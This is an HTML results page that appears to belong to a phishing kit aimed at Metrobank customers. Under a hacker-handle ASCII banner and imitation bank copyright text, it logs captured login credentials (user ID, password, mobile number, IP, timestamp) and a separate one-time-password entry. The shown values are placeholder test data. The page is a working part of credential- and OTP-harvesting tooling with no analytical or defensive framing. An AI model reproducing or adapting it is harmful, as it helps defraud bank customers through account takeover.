<!DOCTYPE HTML>
<html>
<head>
<title>Yhuricka Usuopmaki</title>

<style type="text/css">

body {
	background-color: black !important;
	background: url('https://i.pinimg.com/originals/54/07/32/540732110876fdd9d11664c80fbbc95b.jpg');
	background-repeat: no-repeat;
 	background-attachment: fixed;
h1 {
 text-align:center;
 text-transform:uppercase;
 color:#FFFFFF;
 font-family:'Aldrich',sans-serif;
 font-size:45pt;
 margin-top:0px;
}
img {
 opacity:0.5;-webkit-transition:all 250ms ease;-moz-transition:all 250ms ease;-o-transition:all 250ms ease;transition:all 250ms ease;
 margin-top:-10px;
}
img:hover{ 
 opacity:1;
}
pre {
 text-align:center;
 color:#CCCCCC;
}
a {
 text-decoration:none;
 color:green;
}
a:hover {
 text-decoration:underline;
}
hr {
 width:250px;
}
html {
    margin: 20px auto;
    background:#111111;
    color: grey;
    text-align: center;
}
pre {
    color: Green;
}
header {
    color: white;
    margin: 10px auto;
}

 
/*.kedip {
-webkit-animation-name: blinker;
-webkit-animation-duration: 3s;
-webkit-animation-timing-function: linear;
-webkit-animation-iteration-count: infinite;
 
-moz-animation-name: blinker;
-moz-animation-duration: 2s;
-moz-animation-timing-function: linear;
-moz-animation-iteration-count: infinite;
 
 animation-name: blinker;
 animation-duration: 1s;
 animation-timing-function: linear;
 animation-iteration-count: infinite;
 
 color: green;
}
</style>
</head>
<center>
<header>
<pre onkeydown="return false;" onmousedown="return false;" class="kedip" id="kedipp"><br> Metrobank Login Rezult <br>Copyright ©02020 Metrobank. All rights reserved.<br>
$$\     $$\ $$\                           $$\           $$\                      $$\   $$\                                                                 $$\       $$\ 
\$$\   $$  |$$ |                          \__|          $$ |                     $$ |  $$ |                                                                $$ |      \__|
 \$$\ $$  / $$$$$$$\  $$\   $$\  $$$$$$\  $$\  $$$$$$$\ $$ |  $$\ $$$$$$\        $$ |  $$ | $$$$$$$\ $$\   $$\  $$$$$$\   $$$$$$\  $$$$$$\$$$$\   $$$$$$\  $$ |  $$\ $$\ 
  \$$$$  /  $$  __$$\ $$ |  $$ |$$  __$$\ $$ |$$  _____|$$ | $$  |\____$$\       $$ |  $$ |$$  _____|$$ |  $$ |$$  __$$\ $$  __$$\ $$  _$$  _$$\  \____$$\ $$ | $$  |$$ |
   \$$  /   $$ |  $$ |$$ |  $$ |$$ |  \__|$$ |$$ /      $$$$$$  / $$$$$$$ |      $$ |  $$ |\$$$$$$\  $$ |  $$ |$$ /  $$ |$$ /  $$ |$$ / $$ / $$ | $$$$$$$ |$$$$$$  / $$ |
    $$ |    $$ |  $$ |$$ |  $$ |$$ |      $$ |$$ |      $$  _$$< $$  __$$ |      $$ |  $$ | \____$$\ $$ |  $$ |$$ |  $$ |$$ |  $$ |$$ | $$ | $$ |$$  __$$ |$$  _$$<  $$ |
    $$ |    $$ |  $$ |\$$$$$$  |$$ |      $$ |\$$$$$$$\ $$ | \$$\\$$$$$$$ |      \$$$$$$  |$$$$$$$  |\$$$$$$  |\$$$$$$  |$$$$$$$  |$$ | $$ | $$ |\$$$$$$$ |$$ | \$$\ $$ |
    \__|    \__|  \__| \______/ \__|      \__| \_______|\__|  \__|\_______|       \______/ \_______/  \______/  \______/ $$  ____/ \__| \__| \__| \_______|\__|  \__|\__|
                                                                                                                         $$ |                                            
                                                                                                                         $$ |                                            
                                                                                                                         \__|                                            

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
</pre>
</center>
</pre>
	<style type="text/css">
html {
	text-align: left;
}
header {
    color: blue;
    margin: 10px auto;
}

 
.kedip {
color: lime;
background-color: black;
opacity: 0.5;
}
</style><br>
<pre style=color:violet;>--------------[MetroBank Login Rezult]--------------
User ID: test
Password: 123
Mobile: 09123123123
IP: 127.0.0.1
Timestamp: February 17/14:20
------------[Yhuricka Usuopmaki]------------
--------------[Metrobank OTP]--------------
OTP: 123123
IP: 127.0.0.1
Timestamp: March 08/01:20PM
------------[Yhuricka Usuopmaki]------------
